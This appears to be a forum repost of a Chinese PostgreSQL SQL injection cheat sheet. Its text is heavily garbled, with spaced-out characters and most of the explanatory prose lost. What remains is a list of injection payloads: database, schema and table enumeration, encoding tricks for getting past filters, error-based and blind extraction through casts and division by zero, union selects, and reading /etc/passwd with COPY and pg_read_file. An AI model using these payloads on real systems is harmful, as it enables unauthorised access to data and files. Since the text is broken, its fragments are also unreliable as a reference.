[18402] 2021-08-07_Postgresql注入总结

文档创建者:s7ckTeam
浏览次数:0
最后更新:2025-01-18
2021-08-07_Postgresql注入总结 P o s t g r e s q l   B Y   H A C K   2 0 2 1 - 0 8 - 0 7 # p o s t g r e s q l   , 1 #   , 1
/ /   s e l e c t   c u r r e n t _ d a t a b a s e ( ) ; / /   s e l e c t   c u r r e n t _ u s e r ; / /   s e l e c t   v e r s i o n ( ) ; / /   S E L E C T   c u r r e n t _ s e t t i n g ( ' s e r v e r _ v e r s i o n _ n u m ' ) ; / / s e l e c t   C U R R E N T _ S C H E M A ( )                 / / s e l e c t   p g _ s i z e _ p r e t t y ( p g _ i n d e x e s _ s i z e ( ' u s e r s ' ) ) ; / /   S E L E C T   d a t n a m e   F R O M   p g _ d a t a b a s e   W H E R E   d a t i s t e m p l a t e   =   f a l s e ; s e l e c t   s c h e m a _ n a m e   f r o m   i n f o r m a t i o n _ s c h e m a . s c h e m a t a / /   s e l e c t   *   f r o m   p g _ t a b l e s   w h e r e   s c h e m a n a m e   =   ' p u b l i c ' ; / /   i n f o r m a t i o n _ s c h e m a   s e l e c t   t a b l e _ n a m e   f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   w h e r e   t a b l e _ s c h e m a = ' p u b l i c ' ; / /   s e l e c t   c o l u m n _ n a m e   f r o m   i n f o r m a t i o n _ s c h e m a . c o l u m n s   w h e r e   t a b l e _ n a m e = ' ' ;
                      | | s e l e c t   1 | | 2 ; " " s e l e c t   " u s e r n a m e "   f r o m   u s e r s i n n o t   i n e x i s t s n o t   e x i s t s i s s e l e c t   u s e r n a m e   f r o m   u s e r s   w h e r e   u s e r n a m e   i n   ( " a d m i n " ) / /   s e l e c t   e x i s t s   ( s e l e c t   *   f r o m   u s e r s   w h e r e   u s e r n a m e = ' ' )   s e l e c t   ( 1 = 1 )   i s   t r u e # b i t w i s e   X O R s e l e c t   1 # 2  
  P o s t g r e S Q L P o s t g r e S Q L       P o s t g r e S Q L     S Q L     ( )         使 C - ( ) ( 退 ) ( ) ( ) ( ) ( )     (     )     (   ) / * * / - - E E ' f o o ' E b f n r t * d i g i t s * * d i g i t s * x * h e x d i g i t s * * h e x d i g i t s *
( ) P o s t g r e S Q L   ( )   P o s t g r e S Q L   使     ( ) p o s t g r e s q l         ' ' ' / /   s e l e c t   E ' 1 6 7 1 5 0 1 5 7 1 4 1 1 5 5 1 5 1 ' / /   s e l e c t   E ' x 7 7 x 6 8 x 6 f x 6 1 x 6 d x 6 9 ' s e l e c t   $ $ D i a n n e ' s   h o r s e $ $ m d 5 ( ) e n c o d e ( ' 1 1 1 ' , ' b a s e 6 4 ' ) e n c o d e ( ' 1 1 1 ' , ' h e x ' ) : : t e x t v a r c h a r c h a r
        i n t ( i n t 4 )     d e c i m a l ( n u m e r i c )   b i g i n t ( i n t 8 ) s m a l l i n t ( i n t 2 )   r e a l d o u b l e b o o l e a n t i m e s t a m p     d a t e   t i m e   i n t e r v a l s e l e c t   1 : : v a r c h a r   u n i o n   s e l e c t   ' a ' s e l e c t   C A S T ( ' 5 '   a s   c h a r ) s e l e c t   t o _ c h a r ( 1 2 3 4 ' 9 9 9 ' ) s e l e c t   t o _ d a t e ( t e x t ,   t e x t ) s e l e c t   t o _ n u m b e r ( ' 1 2 , 4 5 4 . 8 - ' ,   ' 9 9 G 9 9 9 D 9 S ' ) s e l e c t   c u r r e n t _ q u e r y ( ) s e l e c t   q u e r y   f r o m   p g _ s t a t _ a c t i v i t y   w h e r e   d a t n a m e = ' x x '   a n d   s t a t e   = ' a c t i v e '
s q l / /   s e l e c t   c a s e   w h e n (   a s c i i ( s u b s t r i n g ( ( s e l e c t   v e r s i o n ( ) ) , 1 , 1 ) ) = 1   )   t h e n   1   e l s e   ( s e l e c t   ' a a a ' / /   s e l e c t   e x p ( ( s e l e c t   c a s e   w h e n (   ( s e l e c t   1 ) = 1     )   t h e n   1   e l s e   7 7 7   e n d ) ) / /   1 / 0 s e l e c t   1 / ( s e l e c t   c a s e   w h e n (   a s c i i ( s u b s t r i n g ( ( s e l e c t   v e r s i o n ( ) ) , 1 , 1 ) ) > 1   )   t h e n   1   e l s e   s e l e c t   c a s t ( ( s e l e c t   v e r s i o n ( ) )   a s   n u m e r i c ) s e l e c t   C A S T ( ( ' z z z z ' | | ( S E L E C T   C O A L E S C E ( C A S T ( s c h e m a n a m e   A S   C H A R A C T E R ( 1 0 0 0 0 ) ) , ( C H R ( 3 2 ) ) ) s e l e c t   b   f r o m   ( s e l e c t   n u l l ,   n u l l   b ,   n u l l   u n i o n   s e l e c t   *   f r o m   u s e r s ) c o p y   t a b l e ( c o l u m n )   f r o m   ' / e t c / p a s s w d '
B Y h t t p : / / d i e g o . t e a m / | s e l e c t   p g _ r e a d _ f i l e ( " / e t c / p a s s w d " ) ;


您需要登录后才可以回帖 登录 | 立即注册

本版积分规则